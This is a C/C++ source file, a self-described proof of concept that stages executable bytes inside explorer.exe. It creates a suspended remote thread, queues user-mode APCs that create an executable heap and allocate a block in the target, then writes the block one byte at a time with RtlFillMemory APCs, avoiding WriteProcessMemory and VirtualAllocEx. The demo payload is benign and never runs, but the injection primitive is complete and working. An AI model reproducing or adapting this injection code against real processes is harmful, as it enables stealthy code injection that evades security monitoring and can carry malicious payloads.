#include <windows.h>
#include <winternl.h>
#include <tchar.h>   /* _tmain / _TCHAR used by the entry point below */
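#pragma comment(lib,"ntdll.lib")

/* ntdll exports declared in this file are resolved through the import library above. */
#define NTKERNELAPI DECLSPEC_IMPORT

#define RTL_MAX_DRIVE_LETTERS 32
/* PEB.GdiHandleBuffer holds 34 ULONG slots in a 32-bit PEB and 60 in a 64-bit PEB. */
#define GDI_HANDLE_BUFFER_SIZE32 34
#define GDI_HANDLE_BUFFER_SIZE64 60
#define GDI_BATCH_BUFFER_SIZE 310

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

/* Select by pointer width (_WIN64), not by _M_X64: the 64-bit PEB layout is
   shared by every 64-bit target, so testing _M_X64 alone would pick the
   32-bit buffer size (and a wrong PEBX64 layout) for an ARM64 build. */
#if defined(_WIN64)
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
#else
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
#endif

typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];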
/*
 * Image of the target's 64-bit PEB, filled by ReadProcessMemory.
 * The fields this file actually consumes are the heap bookkeeping group
 * (NumberOfHeaps / MaximumNumberOfHeaps / ProcessHeaps); everything declared
 * before them exists only so that group lands at the right offset, so the
 * field order and widths must not be touched.  Sized with the build's own
 * PVOID/SIZE_T, i.e. correct only for a 64-bit build reading a 64-bit target.
 * NOTE(review): the layout is the one commonly published for the native PEB;
 * it is not verified here against the exact OS build being targeted.
 */
typedef struct _PEBX64 {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union {
        BOOLEAN BitField;
        struct {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN IsPackagedProcess : 1;
            BOOLEAN IsAppContainer : 1;
            BOOLEAN IsProtectedProcessLight : 1;
            BOOLEAN IsLongPathAwareProcess : 1;
        };
    };
    HANDLE Mutant;
    PVOID ImageBaseAddress;
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PRTL_CRITICAL_SECTION FastPebLock;
    PVOID AtlThunkSListPtr;
    PVOID IFEOKey;
    union {
        ULONG CrossProcessFlags;
        struct {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ProcessPreviouslyThrottled : 1;
            ULONG ProcessCurrentlyThrottled : 1;
            ULONG ReservedBits0 : 25;
        };
        ULONG EnvironmentUpdateCount;
    };
    union {
        PVOID KernelCallbackTable;
        PVOID UserSharedInfoPtr;
    };
    ULONG SystemReserved[1];
    ULONG AtlThunkSListPtr32;
    PVOID ApiSetMap;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];
    PVOID ReadOnlySharedMemoryBase;
    PVOID HotpatchInformation;
    PVOID* ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;
    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;
    LARGE_INTEGER CriticalSectionTimeout;
    SIZE_T HeapSegmentReserve;
    SIZE_T HeapSegmentCommit;
    SIZE_T HeapDeCommitTotalFreeThreshold;
    SIZE_T HeapDeCommitFreeBlockThreshold;
    /* Heap bookkeeping: ProcessHeaps points (in the target) at an array of
       MaximumNumberOfHeaps slots of which NumberOfHeaps are in use. */
    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID* ProcessHeaps;
    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    ULONG GdiDCAttributeList;
    PRTL_CRITICAL_SECTION LoaderLock;
    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
    USHORT OSCSDVersion;
    ULONG OSPlatformId;
    ULONG ImageSubsystem;
    ULONG ImageSubsystemMajorVersion;
    ULONG ImageSubsystemMinorVersion;
    ULONG_PTR ImageProcessAffinityMask;
    GDI_HANDLE_BUFFER GdiHandleBuffer;
    PVOID PostProcessInitRoutine;
    PVOID TlsExpansionBitmap;
    ULONG TlsExpansionBitmapBits[32];
    ULONG SessionId;
    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    PVOID pShimData;
    PVOID AppCompatInfo;
    UNICODE_STRING CSDVersion;
    PVOID ActivationContextData;
    PVOID ProcessAssemblyStorageMap;
    PVOID SystemDefaultActivationContextData;
    PVOID SystemAssemblyStorageMap;
    SIZE_T MinimumStackCommit;
    PVOID* FlsCallback;
    LIST_ENTRY FlsListHead;
    PVOID FlsBitmap;
    ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
    ULONG FlsHighIndex;
    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;
    PVOID pContextData;
    PVOID pImageHeaderHash;
    union {
        ULONG TracingFlags;
        struct {
            ULONG HeapTracingEnabled : 1;
            ULONG CritSecTracingEnabled : 1;
            ULONG LibLoaderTracingEnabled : 1;
            ULONG SpareTracingBits : 29;
        };
    };
    ULONGLONG CsrServerReadOnlySharedMemoryBase;
} PEBX64, * PPEBX64;
#if false
typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; }CLIENT_ID, * PCLIENT_ID; #else
typedef _CLIENT_ID* PCLIENT_ID;
#endif
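#ifdef __cplusplus
extern "C" {
#endif

/* ntdll exports used by this file.  RtlCompareUnicodeString, NtFsControlFile,
   NtWriteFile, RtlImageNtHeader and NtCreateThreadEx are declared but not
   called anywhere in this file; only NtQueueApcThread and RtlCreateUserThread
   are.  Prototypes follow the forms commonly published for ntdll. */

NTKERNELAPI LONG NTAPI RtlCompareUnicodeString(
    IN PCUNICODE_STRING String1,
    IN PCUNICODE_STRING String2,
    IN BOOLEAN CaseInSensitive);

NTKERNELAPI NTSTATUS NTAPI NtFsControlFile(
    __in HANDLE FileHandle,
    __in_opt HANDLE Event,
    __in_opt PIO_APC_ROUTINE ApcRoutine,
    __in_opt PVOID ApcContext,
    __out PIO_STATUS_BLOCK IoStatusBlock,
    __in ULONG IoControlCode,
    __in_bcount_opt(InputBufferLength) PVOID InputBuffer,
    __in ULONG InputBufferLength,
    __out_bcount_opt(OutputBufferLength) PVOID OutputBuffer,
    __in ULONG OutputBufferLength);

NTKERNELAPI NTSTATUS NTAPI NtWriteFile(
    __in HANDLE FileHandle,
    __in_opt HANDLE Event,
    __in_opt PIO_APC_ROUTINE ApcRoutine,
    __in_opt PVOID ApcContext,
    __out PIO_STATUS_BLOCK IoStatusBlock,
    __in_bcount(Length) PVOID Buffer,
    __in ULONG Length,
    __in_opt PLARGE_INTEGER ByteOffset,
    __in_opt PULONG Key);

/* The calling-convention keyword was written twice here originally. */
NTKERNELAPI PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID Base);

/* Queues a user-mode APC to ThreadHandle.  ApcRoutine is invoked with the
   three arguments verbatim, which is what lets ordinary kernel32 functions
   taking up to three pointer-sized parameters serve as APC targets. */
NTKERNELAPI NTSTATUS NTAPI NtQueueApcThread(
    IN HANDLE ThreadHandle,
    IN FARPROC ApcRoutine,
    IN PVOID ApcArgument1,
    IN PVOID ApcArgument2,
    IN PVOID ApcArgument3);

/* Parameter widths corrected: CreateFlags is a ULONG and the three stack
   parameters are SIZE_T.  Declaring them BOOL/DWORD on x64 stores only the low
   32 bits of each stack-passed argument (positions 7..10), so the callee can
   read stale upper halves.  Integer-literal callers are unaffected. */
NTKERNELAPI NTSTATUS NTAPI NtCreateThreadEx(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    LPVOID ObjectAttributes,
    HANDLE ProcessHandle,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    ULONG CreateThreadFlags,
    SIZE_T ZeroBits,
    SIZE_T StackSize,
    SIZE_T MaximumStackSize,
    PVOID lpBytesBuffer);

/* Creates a thread in Process; with CreateSuspended == TRUE the thread does
   not run until ResumeThread, which is what the APC staging below relies on. */
NTKERNELAPI NTSTATUS NTAPI RtlCreateUserThread(
    IN HANDLE Process,
    IN PSECURITY_DESCRIPTOR ThreadSecurityDescriptor OPTIONAL,
    IN BOOLEAN CreateSuspended,
    IN ULONG ZeroBits OPTIONAL,
    IN SIZE_T MaximumStackSize OPTIONAL,
    IN SIZE_T CommittedStackSize OPTIONAL,
    IN LPTHREAD_START_ROUTINE StartAddress,
    IN PVOID Parameter OPTIONAL,
    OUT PHANDLE Thread OPTIONAL,
    OUT PCLIENT_ID ClientId OPTIONAL);

#ifdef __cplusplus
}
#endif

#define NT_CREATE_THREAD_EX_SUSPENDED 1
#define NT_CREATE_THREAD_EX_ALL_ACCESS 0x001FFFFF
/* NT_SUCCESS is defined (under #ifndef) near the top of this file.  The
   unconditional, textually different redefinition that used to follow here
   produced a macro-redefinition warning and has been dropped. */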
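/*
 * Proof of concept: stage a few executable bytes inside explorer.exe without
 * this process ever calling WriteProcessMemory or VirtualAllocEx.  Every
 * memory operation is performed by the target itself: a suspended remote
 * thread whose start routine is ExitThread is created, user-mode APCs that
 * call ordinary kernel32 functions are queued to it, and the thread is resumed
 * so the APCs run and the thread then exits.
 *
 *   1. HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) via APC  -> RWX heap in target.
 *   2. Identify that heap by diffing PEB->ProcessHeaps before and after.
 *   3. HeapAlloc + one RtlFillMemory APC per byte      -> payload written.
 *
 * The staged bytes (xor eax,eax ; ret ; nop) are never executed; only the
 * write primitive is demonstrated.  Assumes a 64-bit build driving a 64-bit
 * explorer (PEBX64 layout) and that the kernel32/kernelbase images are mapped
 * at the same base in both processes, so locally resolved function addresses
 * are valid in the target (the original made the same assumptions).
 */

/* Size of the remote HeapAlloc whose block receives the payload. */
static const SIZE_T kStageAllocSize = 0x2000;

/*
 * Creates a suspended thread in hProcess whose start routine is ExitThread,
 * so once any queued APCs have been delivered it simply exits.
 * Returns the thread handle, or NULL on failure.
 */
static HANDLE CreateSuspendedExitThread(HANDLE hProcess)
{
    HANDLE hThread = NULL;
    CLIENT_ID ClientId = { 0 };
    NTSTATUS Status = RtlCreateUserThread(hProcess, NULL, TRUE, 0, 0, 0,
                                          (LPTHREAD_START_ROUTINE)ExitThread, NULL,
                                          &hThread, &ClientId);
    return NT_SUCCESS(Status) ? hThread : NULL;
}

/*
 * Resumes hThread, waits for it to exit and closes the handle.  Called
 * unconditionally after every APC-queueing attempt: the original only resumed
 * on success, so a failed NtQueueApcThread left a suspended thread (and an
 * open handle) behind in the target for its whole lifetime.
 */
static void RunAndReapThread(HANDLE hThread)
{
    ResumeThread(hThread);
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
}

/*
 * Reads the target's PEB and copies its ProcessHeaps array.
 * On success returns a new[]-allocated array of remote heap handles (caller
 * delete[]s it) and stores its length in *pCount.  Returns NULL with
 * *pCount == 0 on any read failure or on an implausible PEB (zero heaps, or
 * more heaps than the array capacity) -- the latter is the typical symptom of
 * reading a target whose PEB layout does not match PEBX64.
 */
static PULONG_PTR ReadRemoteHeapList(HANDLE hProcess, PVOID PebBase, ULONG* pCount)
{
    PEBX64 Peb = { 0 };
    SIZE_T SizeRet = 0;

    *pCount = 0;
    if (!ReadProcessMemory(hProcess, PebBase, &Peb, sizeof(Peb), &SizeRet) || SizeRet != sizeof(Peb)) {
        return NULL;
    }
    if (Peb.ProcessHeaps == NULL || Peb.NumberOfHeaps == 0 || Peb.NumberOfHeaps > Peb.MaximumNumberOfHeaps) {
        return NULL;
    }

    /* ULONG_PTR equals the remote pointer size only because build and target are both 64-bit. */
    SIZE_T Bytes = (SIZE_T)Peb.NumberOfHeaps * sizeof(ULONG_PTR);
    PULONG_PTR Heaps = new ULONG_PTR[Peb.NumberOfHeaps];
    if (!ReadProcessMemory(hProcess, Peb.ProcessHeaps, Heaps, Bytes, &SizeRet) || SizeRet != Bytes) {
        delete[] Heaps;
        return NULL;
    }
    *pCount = Peb.NumberOfHeaps;
    return Heaps;
}

/*
 * Returns the first entry of New[] that is absent from Old[], i.e. the heap
 * created between the two snapshots, or 0 if every entry was already present.
 * The original read the "old" list and discarded it, then blindly took the
 * last entry of the new list; diffing the two is what that read was for.
 */
static ULONG_PTR FindNewHeap(const ULONG_PTR* Old, ULONG OldCount, const ULONG_PTR* New, ULONG NewCount)
{
    for (ULONG i = 0; i < NewCount; i++) {
        BOOL Seen = FALSE;
        for (ULONG j = 0; j < OldCount && !Seen; j++) {
            Seen = (Old[j] == New[i]);
        }
        if (!Seen) {
            return New[i];
        }
    }
    return 0;
}

/*
 * Measures, on a local heap created with the same flags, the offset of the
 * first kStageAllocSize-byte block from the heap base.
 * ASSUMPTION (inherited from the original, unverified): a fresh heap in the
 * target places its first allocation at the same offset, so base + offset is
 * where the remote HeapAlloc will land.  Returns FALSE if the probe fails.
 */
static BOOL ProbeFirstAllocOffset(SIZE_T* pOffset)
{
    HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    if (hHeap == NULL) {
        return FALSE;
    }
    LPVOID pBlock = HeapAlloc(hHeap, 0, kStageAllocSize);
    BOOL Ok = (pBlock != NULL);
    if (Ok) {
        *pOffset = (SIZE_T)((PBYTE)pBlock - (PBYTE)hHeap);
        HeapFree(hHeap, 0, pBlock);
    }
    HeapDestroy(hHeap);
    return Ok;
}

/*
 * Runs the three APC stages against an already-opened target.
 * Returns 0 on success, 1 on failure.  Every failure path still resumes and
 * reaps any thread it created and frees both heap-list snapshots.
 */
static int StageIntoProcess(HANDLE hProcess)
{
    int rc = 1;
    PULONG_PTR OldHeaps = NULL;
    PULONG_PTR NewHeaps = NULL;
    ULONG OldCount = 0;
    ULONG NewCount = 0;

    do {
        /* Resolve the APC targets by name and bail out early rather than queue
           a NULL routine (which would crash the target, not this process).
           Named locals also avoid shadowing the RtlFillMemory macro. */
        HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
        if (hKernel32 == NULL) {
            break;
        }
        FARPROC pfnHeapCreate = GetProcAddress(hKernel32, "HeapCreate");
        FARPROC pfnHeapAlloc = GetProcAddress(hKernel32, "HeapAlloc");
        FARPROC pfnRtlFillMemory = GetProcAddress(hKernel32, "RtlFillMemory");
        if (pfnHeapCreate == NULL || pfnHeapAlloc == NULL || pfnRtlFillMemory == NULL) {
            break;
        }

        PROCESS_BASIC_INFORMATION BasicInfo = { 0 };
        ULONG URet = 0;
        NTSTATUS Status = NtQueryInformationProcess(hProcess, ProcessBasicInformation,
                                                    &BasicInfo, sizeof(BasicInfo), &URet);
        if (!NT_SUCCESS(Status) || BasicInfo.PebBaseAddress == NULL) {
            break;
        }

        /* Snapshot the heap list so the heap created in stage 1 can be identified. */
        OldHeaps = ReadRemoteHeapList(hProcess, BasicInfo.PebBaseAddress, &OldCount);
        if (OldHeaps == NULL) {
            break;
        }

        /* Stage 1: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0) inside the target. */
        HANDLE hThread = CreateSuspendedExitThread(hProcess);
        if (hThread == NULL) {
            break;
        }
        Status = NtQueueApcThread(hThread, pfnHeapCreate,
                                  (PVOID)(ULONG_PTR)HEAP_CREATE_ENABLE_EXECUTE, NULL, NULL);
        RunAndReapThread(hThread);
        if (!NT_SUCCESS(Status)) {
            break;
        }

        /* Stage 2: the RWX heap is whichever handle was not in the first snapshot. */
        NewHeaps = ReadRemoteHeapList(hProcess, BasicInfo.PebBaseAddress, &NewCount);
        if (NewHeaps == NULL || NewCount <= OldCount) {
            break;
        }
        ULONG_PTR RemoteHeap = FindNewHeap(OldHeaps, OldCount, NewHeaps, NewCount);
        if (RemoteHeap == 0) {
            break;
        }
        SIZE_T Offset = 0;
        if (!ProbeFirstAllocOffset(&Offset)) {
            break;
        }
        ULONG_PTR WriteAt = RemoteHeap + Offset;

        /* Stage 3: HeapAlloc in the target, then one RtlFillMemory(dst, 1, byte)
           APC per payload byte.  Like the original, this relies on the APCs
           being delivered in the order queued, so the block exists before the
           first fill runs. */
        static const BYTE Payload[] = { 0x33, 0xc0, 0xc3, 0x90 }; /* xor eax,eax ; ret ; nop */
        hThread = CreateSuspendedExitThread(hProcess);
        if (hThread == NULL) {
            break;
        }
        Status = NtQueueApcThread(hThread, pfnHeapAlloc,
                                  (PVOID)RemoteHeap, NULL, (PVOID)kStageAllocSize);
        for (SIZE_T i = 0; NT_SUCCESS(Status) && i < sizeof(Payload); i++) {
            Status = NtQueueApcThread(hThread, pfnRtlFillMemory,
                                      (PVOID)(WriteAt + i), (PVOID)1, (PVOID)(ULONG_PTR)Payload[i]);
        }
        /* Resume even after a partial queue: the thread only exits, and what
           was queued is harmless (at worst an unused allocation). */
        RunAndReapThread(hThread);
        if (!NT_SUCCESS(Status)) {
            break;
        }
        rc = 0;
    } while (0);

    delete[] OldHeaps;
    delete[] NewHeaps;
    return rc;
}

/*
 * Entry point: finds explorer.exe through its Shell_TrayWnd window, opens it
 * and runs the staging sequence.  Exit code is 0 on success and 1 on any
 * failure (the original returned 0 unconditionally, hiding every failure).
 * PROCESS_ALL_ACCESS is kept from the original; the minimal right set for
 * RtlCreateUserThread + NtQueueApcThread + ReadProcessMemory was not
 * verified here -- TODO narrow it.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    UNREFERENCED_PARAMETER(argc);
    UNREFERENCED_PARAMETER(argv);

    HWND hTray = FindWindow(L"Shell_TrayWnd", NULL);
    if (hTray == NULL) {
        return 1;
    }
    DWORD dwProcessId = 0;
    if (GetWindowThreadProcessId(hTray, &dwProcessId) == 0 || dwProcessId == 0) {
        return 1;
    }
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (hProcess == NULL) {
        return 1;
    }
    int rc = StageIntoProcess(hProcess);
    CloseHandle(hProcess);   /* the original never closed the process handle */
    return rc;
}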